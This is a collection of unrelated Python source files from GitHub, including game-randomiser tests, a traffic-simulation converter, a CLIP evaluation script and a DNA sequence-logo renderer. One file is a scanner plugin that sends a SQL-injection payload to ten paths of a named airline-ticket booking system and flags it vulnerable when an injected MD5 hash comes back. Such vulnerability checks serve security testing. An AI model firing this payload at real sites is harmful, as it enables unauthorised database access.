countriesTaxAmt = ApplicationWindow.generateTaxForOptions(taxData, companyUSDIncome, companyCode)
return countriesTaxAmt
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
application = ApplicationWindow()
application.show()
sys.exit(app.exec_())
|
larry2967/academic-projects
|
taxcalculator/CompanyTaxSavingsApp.py
|
CompanyTaxSavingsApp.py
|
py
| 14,683
|
python
|
en
|
code
| 0
|
github-code
|
6
|
10423167833
|
from __future__ import annotations
import dataclasses
from random import Random
from unittest.mock import MagicMock
import pytest
from randovania.game_description.game_patches import GamePatches
from randovania.game_description.resources.pickup_index import PickupIndex
from randovania.game_description.resources.resource_type import ResourceType
from randovania.games.common.prime_family.layout.lib.prime_trilogy_teleporters import (
PrimeTrilogyTeleporterConfiguration,
)
from randovania.games.prime2.generator.bootstrap import EchoesBootstrap
from randovania.games.prime2.generator.pickup_pool import sky_temple_keys
from randovania.games.prime2.layout.echoes_configuration import LayoutSkyTempleKeyMode
from randovania.generator.pickup_pool import pool_creator
_GUARDIAN_INDICES = [
PickupIndex(43), # Dark Suit
PickupIndex(79), # Dark Visor
PickupIndex(115), # Annihilator Beam
]
_SUB_GUARDIAN_INDICES = [
PickupIndex(38), # Morph Ball Bomb
PickupIndex(37), # Space Jump Boots
PickupIndex(75), # Boost Ball
PickupIndex(86), # Grapple Beam
PickupIndex(102), # Spider Ball
PickupIndex(88), # Main Power Bombs
]
@pytest.mark.parametrize("vanilla_teleporters", [False, True])
def test_misc_resources_for_configuration(
echoes_resource_database,
default_echoes_configuration,
vanilla_teleporters: bool,
):
# Setup
teleporters = MagicMock(spec=PrimeTrilogyTeleporterConfiguration)
configuration = dataclasses.replace(default_echoes_configuration, teleporters=teleporters)
teleporters.is_vanilla = vanilla_teleporters
gfmc_resource = echoes_resource_database.get_by_type_and_index(ResourceType.MISC, "VanillaGFMCGate")
torvus_resource = echoes_resource_database.get_by_type_and_index(ResourceType.MISC, "VanillaTorvusTempleGate")
great_resource = echoes_resource_database.get_by_type_and_index(ResourceType.MISC, "VanillaGreatTempleEmeraldGate")
# Run
result = dict(
configuration.game.generator.bootstrap.misc_resources_for_configuration(
configuration,
echoes_resource_database,
)
)
relevant_tricks = {trick: result[trick] for trick in [gfmc_resource, torvus_resource, great_resource]}
# Assert
assert relevant_tricks == {
gfmc_resource: 0,
torvus_resource: 0,
great_resource: 0 if not vanilla_teleporters else 1,
}
@pytest.mark.parametrize("stk_mode", LayoutSkyTempleKeyMode)
def test_assign_pool_results(echoes_game_description, default_echoes_configuration, stk_mode: LayoutSkyTempleKeyMode):
patches = GamePatches.create_from_game(
echoes_game_description, 0, dataclasses.replace(default_echoes_configuration, sky_temple_keys=stk_mode)
)
pool_results = pool_creator.calculate_pool_results(patches.configuration, patches.game)
# Run
result = EchoesBootstrap().assign_pool_results(
Random(1000),
patches,
pool_results,
)
# Assert
shuffled_stks = [
pickup for pickup in pool_results.to_place if pickup.pickup_category == sky_temple_keys.SKY_TEMPLE_KEY_CATEGORY
]
assert result.starting_equipment == pool_results.starting
if stk_mode == LayoutSkyTempleKeyMode.ALL_BOSSES:
assert len(shuffled_stks) == 0
assert set(result.pickup_assignment.keys()) == set(_GUARDIAN_INDICES + _SUB_GUARDIAN_INDICES)
elif stk_mode == LayoutSkyTempleKeyMode.ALL_GUARDIANS:
assert len(shuffled_stks) == 0
assert set(result.pickup_assignment.keys()) == set(_GUARDIAN_INDICES)
else:
assert len(shuffled_stks) == stk_mode.num_keys
|
randovania/randovania
|
test/games/prime2/generator/test_echoes_bootstrap.py
|
test_echoes_bootstrap.py
|
py
| 3,634
|
python
|
en
|
code
| 165
|
github-code
|
6
|
8385237281
|
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
from argparse import ArgumentParser
if 'SUMO_HOME' in os.environ:
sys.path.append(os.path.join(os.environ['SUMO_HOME'], 'tools'))
import sumolib # noqa
def get_options(args=None):
parser = ArgumentParser(description="Sample routes to match counts")
parser.add_argument("-t", "--turn-file", dest="turnFile",
help="Input turn-count file")
parser.add_argument("-o", "--output-file", dest="out",
help="Output edgeRelations file")
parser.add_argument("--turn-attribute", dest="turnAttr", default="probability",
help="Write turning 'probability' to the given attribute")
options = parser.parse_args(args=args)
if options.turnFile is None or options.out is None:
parser.print_help()
sys.exit()
return options
def main(options):
with open(options.out, 'w') as outf:
sumolib.writeXMLHeader(outf, "$Id$", "data", "datamode_file.xsd") # noqa
for interval in sumolib.xml.parse(options.turnFile, 'interval'):
outf.write(' <interval begin="%s" end="%s">\n' % (
interval.begin, interval.end))
if interval.fromEdge:
for fromEdge in interval.fromEdge:
for toEdge in fromEdge.toEdge:
outf.write(' ' * 8 + '<edgeRelation from="%s" to="%s" %s="%s"/>\n' % (
fromEdge.id, toEdge.id, options.turnAttr, toEdge.probability))
outf.write(' </interval>\n')
outf.write('</edgeRelations>\n')
if __name__ == "__main__":
main(get_options())
|
ngctnnnn/DRL_Traffic-Signal-Control
|
sumo-rl/sumo/tools/turn-defs/turnFile2EdgeRelations.py
|
turnFile2EdgeRelations.py
|
py
| 1,716
|
python
|
en
|
code
| 17
|
github-code
|
6
|
14205921043
|
import collections
class Node:
def __init__(self, value):
self.value = value
self.neighbours = []
def make_graph(n_of_nodes, edges):
graph = []
for i in range(n_of_nodes):
node = Node(i+1)
graph.append(node)
for first_node, second_node in edges:
graph[first_node-1].neighbours.append(graph[second_node-1])
graph[second_node-1].neighbours.append(graph[first_node-1])
return graph
def calculate_distances_with_bfs(starting_node, n_of_nodes):
visited = set()
distances = [-1]*n_of_nodes
queue = collections.deque()
queue.append((starting_node, 0))
while queue:
current_node, distance = queue.popleft()
if current_node not in visited:
visited.add(current_node)
distances[current_node.value-1] = distance
for neighbour in current_node.neighbours:
queue.append((neighbour, distance+6))
return distances
def get_distances(n_of_nodes, edges, starting_node_value):
graph = make_graph(n_of_nodes, edges)
starting_node = graph[starting_node_value-1]
distances = calculate_distances_with_bfs(starting_node, n_of_nodes)
distances.remove(0)
return distances
|
jdalbosco/hackerrank
|
preparation-kits/one-week/d6-mock_test.py
|
d6-mock_test.py
|
py
| 1,287
|
python
|
en
|
code
| 0
|
github-code
|
6
|
37430288968
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: ็ฅจๅๆบ็ฅจ้ข่ฎข็ณป็ป10ๅคSQLๆณจๅ
ฅ
referer: http://www.wooyun.org/bugs/wooyun-2010-0118867
author: Lucifer
description: multi sqliใ
'''
import sys
import requests
class piaoyou_ten_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
urls = ["/Other/train_input.aspx?memberid=1",
"/Other/hotel_input.aspx?memberid=1",
"/Other/input.aspx?memberid=1",
"/flight/Print_url_sel.aspx?id=2",
"/flight/Xcd_selected.aspx?id=111",
"/System/history.aspx?id=1",
"/flight/scgq.aspx?id=1",
"/Other/Edit.aspx?id=1",
"/flight/Html.aspx?id=1",
"/info/zclist_new.aspx?id=1"]
try:
for url in urls:
vulnurl = self.url + url + "AnD/**/1=Sys.Fn_VarBinToHexStr(HashBytes(%27Md5%27,%271234%27))--"
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
return "[+]ๅญๅจ็ฅจๅๆบ็ฅจ้ข่ฎข็ณป็ป10ๅคSQLๆณจๅ
ฅๆผๆด...(้ซๅฑ)\tpayload: "+vulnurl
except:
return "[-]connect timeout"
if __name__ == "__main__":
testVuln = piaoyou_ten_sqli_BaseVerify(sys.argv[1])
testVuln.run()
|
iceyhexman/onlinetools
|
scanner/plugins/cms/piaoyou/piaoyou_ten_sqli.py
|
piaoyou_ten_sqli.py
|
py
| 1,575
|
python
|
en
|
code
| 1,626
|
github-code
|
6
|
74725395066
|
from datetime import datetime
from pynamodb.models import Model
from pynamodb.attributes import UnicodeAttribute, NumberAttribute, UTCDateTimeAttribute
from flask_blog.lib.utils import is_production
import os
class Entry(Model):
class Meta:
table_name = "serverless_blog_entries"
region = 'ap-northeast-1'
# ๆฌ็ช็ฐๅข็จใฎ่จญๅฎ
if is_production():
aws_access_key_id = os.environ.get('SERVERLESS_AWS_ACCESS_KEY_ID')
aws_secret_access_key = os.environ.get('SERVERLESS_AWS_SECRET_KEY')
# ้็บ็ฐๅข็จใฎ่จญๅฎ
else:
aws_access_key_id = 'AWS_ACEESS_KEY_ID'
aws_secret_access_key = 'AWS_SECRET_ACCESS_KEY'
host = "http://localhost:8000"
# ใซใฉใ ใฎๅฎ็พฉ
id = NumberAttribute(hash_key=True, null=False) # ๆฐๅค
title = UnicodeAttribute(null=True) # ๆๅญๅ
text = UnicodeAttribute(null=True) # ๆๅญๅ
created_at = UTCDateTimeAttribute(default=datetime.now) # UTCใใผในใฎ Datetime
|
uni51/serverless_python_tutorial
|
application/flask_blog/models/entries.py
|
entries.py
|
py
| 1,030
|
python
|
en
|
code
| 0
|
github-code
|
6
|
72995183868
|
import os
import sys
import time
import struct
import debug
import eosapi
from eosapi import N, push_transactions
from common import prepare, Sync
from tools import cpp2wast
def init_debug(wasm=True):
def init_decorator(func):
def func_wrapper(*args, **kwargs):
if wasm:
_src_dir = os.path.dirname(os.path.abspath(__file__))
cpp2wast.set_src_path(_src_dir)
cpp2wast.build_native('lab.cpp', 'lab', debug=False)
lib_file = os.path.join(_src_dir, 'liblab.dylib')
# debug.set_debug_contract('lab', lib_file)
return func(*args, **kwargs)
return func_wrapper
return init_decorator
def init(wasm=True):
def init_decorator(func):
def func_wrapper(*args, **kwargs):
if wasm:
prepare('lab', 'lab.wast', 'lab.abi', __file__)
return func(*args, **kwargs)
else:
prepare('lab', 'lab.py', 'lab.abi', __file__)
return func(*args, **kwargs)
return func_wrapper
return init_decorator
_dir = os.path.dirname(os.path.abspath(__file__))
sync = Sync(_account = 'lab', _dir = _dir, _ignore = ['lab.py'])
@init(True)
def test(msg='hello,world'):
r = eosapi.push_action('lab', 'sayhello', msg, {'lab':'active'})
assert r
@init()
def deploy():
sync.deploy_all()
@init()
def deploy_mpy():
sync.deploy_all_mpy()
@init()
def test2(count=100):
import time
import json
actions = []
for i in range(count):
action = ['lab', 'sayhello', str(i), {'lab':'active'}]
actions.append(action)
ret, cost = eosapi.push_actions(actions)
assert ret
print(ret['elapsed'])
print(cost)
print('total cost time:%.3f s, cost per action: %.3f ms, actions per second: %.3f'%(cost/1e6, cost/count/1000, 1*1e6/(cost/count)))
def set_contract(account, src_file, abi_file, vmtype=1, sign=True):
'''Set code and abi for the account
Args:
account (str) : account name
src_file (str) : source file path
abi_file (str) : abi file path
vmtype : virtual machine type, 0 for wasm, 1 for micropython, 2 for evm
sign (bool) : True to sign transaction
Returns:
JsonStruct|None:
'''
account = eosapi.N(account)
code = struct.pack('QBB', account, vmtype, 0)
if vmtype == 0:
with open(src_file, 'rb') as f:
wasm = eosapi.wast2wasm(f.read())
code += eosapi.pack_bytes(wasm)
setcode = [N('eosio'), N('setcode'), [[account, N('active')]], code]
return push_transactions([[setcode]], sign, compress = True)
def build_native():
_src_dir = os.path.dirname(os.path.abspath(__file__))
cpp2wast.set_src_path(_src_dir)
cpp2wast.build_native('lab.cpp', 'lab', debug=False)
lib_file = os.path.join(_src_dir, 'liblab.dylib')
debug.set_debug_contract('lab', lib_file)
@init()
#@init_debug()
def test3(count=200):
actions = []
for i in range(count):
action = ['counter', 'count', str(i), {'counter':'active'}]
actions.append([action])
ret, cost = eosapi.push_transactions(actions)
assert ret
print('total cost time:%.3f s, cost per action: %.3f ms, transaction per second: %.3f'%(cost/1e6, cost/count/1000, 1*1e6/(cost/count)))
|
learnforpractice/pyeos
|
programs/pyeos/tests/wasm/lab/t.py
|
t.py
|
py
| 3,368
|
python
|
en
|
code
| 131
|
github-code
|
6
|
10966117387
|
import os
import clip
import torch.nn as nn
from datasets import Action_DATASETS
from torch.utils.data import DataLoader
from tqdm import tqdm
import wandb
import argparse
import shutil
from pathlib import Path
import yaml
from dotmap import DotMap
import pprint
import numpy
from modules.Visual_Prompt import visual_prompt
from utils.Augmentation import get_augmentation
import torch
from utils.Text_Prompt import *
import pdb
from sklearn.metrics import f1_score
from sklearn.metrics import balanced_accuracy_score
import pandas as pd
import numpy as np
import logging
class TextCLIP(nn.Module):
def __init__(self, model):
super(TextCLIP, self).__init__()
self.model = model
def forward(self, text):
return self.model.encode_text(text)
class ImageCLIP(nn.Module):
def __init__(self, model):
super(ImageCLIP, self).__init__()
self.model = model
def forward(self, image):
return self.model.encode_image(image)
def val_metrics(pred, logger):
# pdb.set_trace()
test_num_each = [5464, 5373, 27014, 4239, 3936, 6258, 10474, 6273,
10512, 6667, 22131, 4661, 8855, 14047, 28896, 4209]
test_num_snippet = [43, 42, 212, 34, 31, 49, 82, 50, 83, 53, 173, 37, 70, 110, 226, 33]
# test_num_rem = [88, 125, 6, 15, 96, 114, 106, 1, 16, 11, 115, 53, 23, 95, 96, 113]
mean_weighted_f1 = 0.0
mean_unweighted_f1 = 0.0
mean_global_f1 = 0.0
mean_balanced_acc = 0.0
each_wf1 = []
each_unf1 = []
each_gf1 = []
each_bacc = []
test_labels_pth = ''
for i in range(16):
predi = pred[sum(test_num_snippet[:i]): sum(test_num_snippet[:i+1])]
predi = [p for p in predi for _ in range(128)]
predi = predi[:test_num_each[i]]
tl_pth = test_labels_pth + '/test_video_' + str(i).zfill(4) + '.csv'
ls = np.array(pd.read_csv(tl_pth, usecols=['frame_label']))
label = []
predict = []
for idx, l in enumerate(ls):
if not np.isnan(l):
label.append(int(l))
predict.append(predi[idx])
# pdb.set_trace()
mean_weighted_f1 += f1_score(label, predict, average='weighted')/16.0
mean_unweighted_f1 += f1_score(label, predict, average='macro') / 16.0
mean_global_f1 += f1_score(label, predict, average='micro') / 16.0
mean_balanced_acc += balanced_accuracy_score(label, predict) / 16.0
each_wf1.append(f1_score(label, predict, average='weighted'))
each_unf1.append(f1_score(label, predict, average='macro'))
each_gf1.append(f1_score(label, predict, average='micro'))
each_bacc.append(balanced_accuracy_score(label, predict))
# print('video: ', i, 'label: ', label, 'predict: ', predict)
logger.info('wf1: {}'.format(each_wf1))
logger.info('unf1:{}'.format(each_unf1))
logger.info('gf1:{}'.format(each_gf1))
logger.info('bacc:{}'.format(each_bacc))
return mean_weighted_f1, mean_unweighted_f1, mean_global_f1, mean_balanced_acc
def validate_val(epoch, val_loader, classes, device, model, fusion_model, config, num_text_aug):
model.eval()
fusion_model.eval()
num = 0
corr_1 = 0
corr_5 = 0
predict_list = []
label_list = []
label2 = []
pred2 = []
with torch.no_grad():
text_inputs = classes.to(device)
text_features = model.encode_text(text_inputs) # (bs*num_classes, 512)
for iii, (image, class_id) in enumerate(tqdm(val_loader)):
# image: (bs, 24, 224, 224)
image = image.view((-1, config.data.num_segments, 3) + image.size()[-2:])
# image: (16, 8, 3, 224, 224)
b, t, c, h, w = image.size()
class_id = class_id.to(device)
image_input = image.to(device).view(-1, c, h, w)
image_features = model.encode_image(image_input).view(b, t, -1)
image_features = fusion_model(image_features) # (bs, 512)
image_features /= image_features.norm(dim=-1, keepdim=True)
text_features /= text_features.norm(dim=-1, keepdim=True)
similarity = (100.0 * image_features @ text_features.T)
similarity = similarity.view(b, num_text_aug, -1)
# pdb.set_trace()
similarity = similarity.softmax(dim=-1)
similarity = similarity.mean(dim=1, keepdim=False)
values_1, indices_1 = similarity.topk(1, dim=-1)
# values_5, indices_5 = similarity.topk(5, dim=-1)
num += b
# print(indices_1)
# print(class_id)
# pdb.set_trace()
for i in range(b):
if values_1[i] < 0.5:
indices_1[i] = -1
# pdb.set_trace()
label_list.append(int(class_id[i].cpu().numpy()))
predict_list.append(indices_1[i].cpu().numpy()[0])
# if indices_1[i] == class_id[i]:
# corr_1 += 1
# if class_id[i] in indices_5[i]:
# corr_5 += 1
# pdb.set_trace()
# f1score = f1_score(label2, pred2, average='weighted')
# acc = accuracy_score(label2, pred2)
# pdb.set_trace()
bacc = balanced_accuracy_score(label_list, predict_list)
print('Epoch: [{}/{}]: bacc:{}'.format(epoch, config.solver.epochs, bacc))
return bacc
def validate(epoch, val_loader, classes, device, model, fusion_model, config, num_text_aug, logger):
model.eval()
fusion_model.eval()
num = 0
corr_1 = 0
corr_5 = 0
predict_list = []
label_list = []
label2 = []
pred2 = []
with torch.no_grad():
text_inputs = classes.to(device)
text_features = model.encode_text(text_inputs) # (bs*num_classes, 512)
for iii, (image, class_id) in enumerate(tqdm(val_loader)):
# image: (bs, 24, 224, 224)
image = image.view((-1, config.data.num_segments, 3) + image.size()[-2:])
# image: (16, 8, 3, 224, 224)
b, t, c, h, w = image.size()
class_id = class_id.to(device)
image_input = image.to(device).view(-1, c, h, w)
image_features = model.encode_image(image_input).view(b, t, -1)
image_features = fusion_model(image_features) # (bs, 512)
image_features /= image_features.norm(dim=-1, keepdim=True)
text_features /= text_features.norm(dim=-1, keepdim=True)
similarity = (100.0 * image_features @ text_features.T)
similarity = similarity.view(b, num_text_aug, -1)
# pdb.set_trace()
similarity = similarity.softmax(dim=-1)
similarity = similarity.mean(dim=1, keepdim=False)
values_1, indices_1 = similarity.topk(1, dim=-1)
# values_5, indices_5 = similarity.topk(5, dim=-1)
num += b
# print(indices_1)
# print(class_id)
# pdb.set_trace()
for i in range(b):
# if values_1[i] < 0.5:
# indices_1[i] = -1
# pdb.set_trace()
# label_list.append(int(class_id[i].cpu().numpy()))
predict_list.append(indices_1[i].cpu().numpy()[0])
# if indices_1[i] == class_id[i]:
# corr_1 += 1
# if class_id[i] in indices_5[i]:
# corr_5 += 1
# pdb.set_trace()
# f1score = f1_score(label2, pred2, average='weighted')
# acc = accuracy_score(label2, pred2)
wf1, unf1, gf1, bacc = val_metrics(predict_list, logger)
# top1 = f1score
# top5 = float(corr_5) / num * 100
# wandb.log({"top1": top1})
# wandb.log({"top5": top5})
# print('Epoch: [{}/{}]: Top1: {}, Top5: {}'.format(epoch, config.solver.epochs, top1, top5))
logger.info('Epoch: [{}/{}]: wf1:{:.3f} unf1:{:.3f} gf1:{:.3f} bacc:{:.3f}'.format(epoch, config.solver.epochs, wf1, unf1, gf1, bacc))
return wf1
def main():
global args, best_prec1
global global_step
parser = argparse.ArgumentParser()
parser.add_argument('--config', '-cfg', default='')
parser.add_argument('--log_time', default='')
args = parser.parse_args()
with open(args.config, 'r') as f:
config = yaml.load(f)
working_dir = os.path.join('./exp', config['network']['type'], config['network']['arch'], config['data']['dataset'],
args.log_time)
wandb.init(project=config['network']['type'],
name='{}_{}_{}_{}'.format(args.log_time, config['network']['type'], config['network']['arch'],
config['data']['dataset']))
print('-' * 80)
print(' ' * 20, "working dir: {}".format(working_dir))
print('-' * 80)
print('-' * 80)
print(' ' * 30, "Config")
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(config)
print('-' * 80)
config = DotMap(config)
Path(working_dir).mkdir(parents=True, exist_ok=True)
shutil.copy(args.config, working_dir)
shutil.copy('test.py', working_dir)
device = "cuda" if torch.cuda.is_available() else "cpu" # If using GPU then use mixed precision training.
model, clip_state_dict = clip.load(config.network.arch, device=device, jit=False, tsm=config.network.tsm,
T=config.data.num_segments, dropout=config.network.drop_out,
emb_dropout=config.network.emb_dropout) # Must set jit=False for training ViT-B/32
transform_val = get_augmentation(False, config)
fusion_model = visual_prompt(config.network.sim_header, clip_state_dict, config.data.num_segments)
model_text = TextCLIP(model)
model_image = ImageCLIP(model)
model_text = torch.nn.DataParallel(model_text).cuda()
model_image = torch.nn.DataParallel(model_image).cuda()
fusion_model = torch.nn.DataParallel(fusion_model).cuda()
wandb.watch(model)
wandb.watch(fusion_model)
val_data = Action_DATASETS(config.data.val_list, config.data.label_list, num_segments=config.data.num_segments,
image_tmpl=config.data.image_tmpl,
transform=transform_val, random_shift=config.random_shift)
val_loader = DataLoader(val_data, batch_size=config.data.batch_size, num_workers=config.data.workers, shuffle=False,
pin_memory=True, drop_last=True)
if device == "cpu":
model_text.float()
model_image.float()
else:
clip.model.convert_weights(
model_text) # Actually this line is unnecessary since clip by default already on float16
clip.model.convert_weights(model_image)
start_epoch = config.solver.start_epoch
if config.pretrain:
if os.path.isfile(config.pretrain):
print(("=> loading checkpoint '{}'".format(config.pretrain)))
checkpoint = torch.load(config.pretrain)
model.load_state_dict(checkpoint['model_state_dict'])
fusion_model.load_state_dict(checkpoint['fusion_model_state_dict'])
del checkpoint
else:
print(("=> no checkpoint found at '{}'".format(config.pretrain)))
classes, num_text_aug, text_dict = text_prompt(val_data)
best_prec1 = 0.0
prec1 = validate(start_epoch, val_loader, classes, device, model, fusion_model, config, num_text_aug)
if __name__ == '__main__':
main()
|
Lycus99/SDA-CLIP
|
test.py
|
test.py
|
py
| 11,801
|
python
|
en
|
code
| 0
|
github-code
|
6
|
3469450468
|
# As per the requirements:
# Marshall Christian 001520145
# This table was inspired with the help of Cemel Tepe as well as Cemel Tepe - "Let's go hashing"
# Space complexity = O(n)
class HashTable(object):
def __init__(self, size=10):
self._struct = self.struct_creation(size)
# insert() hashes the key. Then finds the modular
# Then, uses the modular to find the appropriate bucket to append
# Time complexity: O(n) - 'n' being the size of the bucket
def insert(self, key, value):
hashed_key = hash(key)
bucket = self.find_bucket(hashed_key)
mod = self.look_up_key_value_pair(hashed_key, bucket)
if len(mod) == 0:
bucket.append([hashed_key, value])
else:
mod[1] = value
return True
# remove() will find a key in the bucket and remove it.
# Time complexity: O(1)
def remove(self, key):
bucket = self.find_bucket(key)
if key in bucket:
bucket.remove(key)
# struck_creation() loops through the hash table and creates buckets for later
# Time complexity: O(n)
def struct_creation(self, size):
struct = []
for i in range(size):
struct.append([])
return struct
# find() takes a key, hashes it and finds the matching bucket
# Then, loops through the bucket to find the key-value pair
# Time complexity: O(n) - 'n' being the size of the bucket
def look_up(self, key):
hashed_key = hash(key)
bucket = self.find_bucket(hashed_key)
key_value_pair = self.look_up_key_value_pair(hashed_key, bucket)
if key_value_pair:
return key_value_pair[1]
raise Exception("Key-Value pair does not exist")
# find_key_value_pair() loops through the bucket to find the needed key with value pair
# Time complexity: O(n)
def look_up_key_value_pair(self, key, bucket):
for keey_value_pair in bucket:
if keey_value_pair[0] == key:
return keey_value_pair
return []
# find_bucket() uses hashed key to find the needed bucket
# Time complexity: O(1)
def find_bucket(self, key):
return self._struct[key % len(self._struct)]
|
MarsTheProgrammer/Delivery-System-for-Packages
|
HashTable.py
|
HashTable.py
|
py
| 2,237
|
python
|
en
|
code
| 0
|
github-code
|
6
|
44091100190
|
import os
import os.path
import numpy as np
from PIL import Image
from PIL import ImageDraw
from PIL import ImageFont
_logo_fonts = { "Arial" : ImageFont.truetype(os.path.abspath(os.path.dirname(__file__))+"/arial.ttf", 200),
"ArialBold" : ImageFont.truetype(os.path.abspath(os.path.dirname(__file__))+"/arialbd.ttf", 200),
"Courier" : ImageFont.truetype(os.path.abspath(os.path.dirname(__file__))+"/cour.ttf", 200) }
_lettercache_unsized = {}
_lettercache = {}
def _autocrop(I):
I = np.array(I)
# Cut out all the rows/columns that are all white
I = I[np.where(np.any(I[:,:,:3].min(axis=1)!=255,axis=1))[0],:,:] # Crop vertical
I = I[:,np.where(np.any(I[:,:,:3].min(axis=0)!=255,axis=1))[0],:] # Crop horizontal
# Add white border. Helps avoid edge artifacts when resizing down with anti-aliasing
pad1 = 255*np.ones_like(I[:1,:,:]); pad1[:,:,3] = 0
I = np.vstack([pad1, I, pad1])
pad2 = 255*np.ones_like(I[:,:3,:]); pad2[:,:,3] = 0
I = np.hstack([pad2, I, pad2])
return Image.fromarray(I)
uparrow_chr = u'\u25B2'
def _get_letterimg_unsized(letter, font):
global _lettercache_unsized
global _logo_fonts
colors = { "A" : (0,200,0),
"C" : (0,0,200),
"G" : (235,140,0),
"T" : (200,0,0),
"U" : (200,0,0),
"N" : (128,128,128),
uparrow_chr : (128,128,128) }
assert letter in colors, "Unrecognized letter"
assert font in _logo_fonts, "Unrecognized font"
if (letter,font) not in _lettercache_unsized:
# Draw full-sized versions of this letter
letterimg = 255*np.ones((256,256,4), np.uint8)
letterimg[:,:,3] = 0 # Transparent by default
letterimg = Image.fromarray(letterimg)
draw = ImageDraw.Draw(letterimg)
draw.text((1,1), letter, colors[letter], font=_logo_fonts[font])
letterimg = _autocrop(letterimg)
_lettercache_unsized[(letter,font)] = letterimg
return _lettercache_unsized[(letter,font)]
def get_letterimg(letter, width, height, font="ArialBold"):
global _lettercache
assert width and height
# If we've never been asked for a letter of this width/zheight before,
# then we use Image.resize to generate a new one.
if (letter,width,height,font) not in _lettercache:
letterimg = _get_letterimg_unsized(letter, font)
letterimg = letterimg.resize((width, height), Image.ANTIALIAS)
_lettercache[(letter,width,height,font)] = np.array(letterimg).reshape((height,width,4))
return _lettercache[(letter,width,height,font)]
def tape2logo(tape, height=51, letterwidth=6, bufferzoom=4, refseq=None, vmax=None, style=None, rna=False, transparent=False, complement=False):
# Styles "stack" "grow" "growclip" "growfade" "bars" "bar"
tapedim,tapelen = tape.shape # n = number of filters
if tapedim != 4:
raise NotImplementedError("Expected tape with 4 rows")
if vmax is not None:
tape = np.maximum(-vmax, np.minimum(vmax, tape))
zheight = height*bufferzoom
zletterwidth = letterwidth*bufferzoom
mid1 = (zheight-bufferzoom)//2
mid2 = (zheight-bufferzoom)//2 + bufferzoom
if refseq:
assert len(refseq) == tapelen
refseq_height = int(letterwidth*bufferzoom*1.1)
# Create an up-arrow image
arrowheight = int(refseq_height*0.15)
uparrow_img = get_letterimg(uparrow_chr, zletterwidth//2, arrowheight, font="Arial")
pad1 = 255*np.ones((arrowheight, zletterwidth//4, 4))
pad1[:,:,3] = 0
uparrow_img = np.hstack([pad1, uparrow_img])
pad2 = 255*np.ones((arrowheight, zletterwidth-uparrow_img.shape[1], 4))
pad2[:,:,3] = 0
uparrow_img = np.hstack([uparrow_img, pad2])
mid1 -= refseq_height//2+2*bufferzoom
mid2 = mid1+refseq_height+4*bufferzoom
positive_only = bool(np.all(tape.ravel() >= 0)) or (style in ("grow", "growfade","bar"))
if positive_only:
mid1 = zheight
mid2 = zheight
translate = { "A":"A", "C":"C", "G":"G", "T":"T", "U":"U", "N":"N" }
if complement:
translate = { "A":"T", "C":"G", "G":"C", "T":"A", "U":"A", "N":"N" }
lettertable = ["A","C","G","U" if rna else "T"]
barcolors = { "A" : (128,220,128),
"C" : (128,128,220),
"G" : (245,200,90),
"T" : (220,128,128),
"U" : (220,128,128),
"N" : (192,192,192) }
def make_lettercol(t, colheight, reverse):
# Only show letters with positive coefficient in f
idx = [i for i in range(4) if t[i] > 0]
# Put largest positive value first in "above", and put largest negative value last in "below"
idx = sorted(idx, key=lambda i: t[i])
# Calculate the individual zheight of each letter in pixels
zheights = [int(round(t[i]/sum(t[idx])*colheight)) for i in idx]
idx = [i for i,h in zip(idx,zheights) if h > 0]
zheights = [h for h in zheights if h > 0]
# While the stack of letters is too tall, remove pixel rows from the smallest-zheight entries
#print sum(zheights) - mid1
while sum(zheights) > mid1:
zheights[-1] -= 1
if zheights[-1] == 0:
zheights.pop()
idx.pop()
# Make the individual images, reversing their order if so requested
imgs = [get_letterimg(lettertable[i], zletterwidth, h) for i,h in zip(idx, zheights)]
if reverse:
imgs = [img for img in reversed(imgs)]
return np.vstack(imgs) if imgs else np.empty((0, zletterwidth, 4))
if style == "seqlogo":
assert positive_only
L = 255*np.ones((zheight,tapelen*zletterwidth,4), np.uint8)
L[:,:,3] = 0 # Transparent
for j in range(tapelen):
bits = 2 + np.sum(tape[:,j] * np.log2(tape[:,j]))
letterimg = make_lettercol( tape[:,j], mid1 * bits/2., reverse=True)
L[mid1-letterimg.shape[0]:mid1,j*zletterwidth:(j+1)*zletterwidth,:] = letterimg
# Rescale it down to the original requested size
L = np.array(Image.fromarray(L).resize((tapelen*letterwidth, height), Image.ANTIALIAS))
if not transparent:
L[:,:,3] = 255 # full opacity
return L
pos_tape = np.maximum(1e-16, tape)
neg_tape = np.maximum(1e-16,-tape)
pos_colheights = pos_tape.max(axis=0)
neg_colheights = neg_tape.max(axis=0)
#max_colheight = np.maximum(pos_colheights, neg_colheights).max()
#max_colheight = (pos_colheights + neg_colheights).max()
max_colheight = neg_colheights.max()
#neg_colheights = np.minimum(max_colheight,neg_colheights)
pos_colheights /= max_colheight
neg_colheights /= max_colheight
# If we've been told to scale everything relative to a certain maximum, then adjust our scales accordinly
if vmax:
pos_colheights *= pos_tape.max() / vmax
neg_colheights *= neg_tape.max() / vmax
L = 255*np.ones((zheight,tapelen*zletterwidth,4), np.uint8)
L[:,:,3] = 0 # Start transparent
# For each column of the filter, generate a stack of letters for the logo
for j in range(tapelen):
if style in (None,"stack"):
# Generate the stack of letters that goes above, and below, the dividing ling
aboveimg = make_lettercol( tape[:,j], mid1 * pos_colheights[j], reverse=True)
belowimg = make_lettercol(-tape[:,j], mid1 * neg_colheights[j], reverse=False) if not positive_only else None
# Insert the stacked images into column j of the logo image
L[mid1-aboveimg.shape[0]:mid1,j*zletterwidth:(j+1)*zletterwidth,:] = aboveimg
if not positive_only:
L[mid2:mid2+belowimg.shape[0],j*zletterwidth:(j+1)*zletterwidth,:] = belowimg
if refseq:
letterimg = get_letterimg(refseq[j], zletterwidth, refseq_height, font="ArialBold")
L[mid1+2*bufferzoom:mid2-2*bufferzoom,j*zletterwidth:(j+1)*zletterwidth,:] = letterimg
elif style == "growclip":
# Grow the height of each letter based on binding
zletterheight = int(mid1 * neg_colheights[j])
if zletterheight:
letterimg = get_letterimg(refseq[j] if refseq else "N", zletterwidth, zletterheight, font="ArialBold")
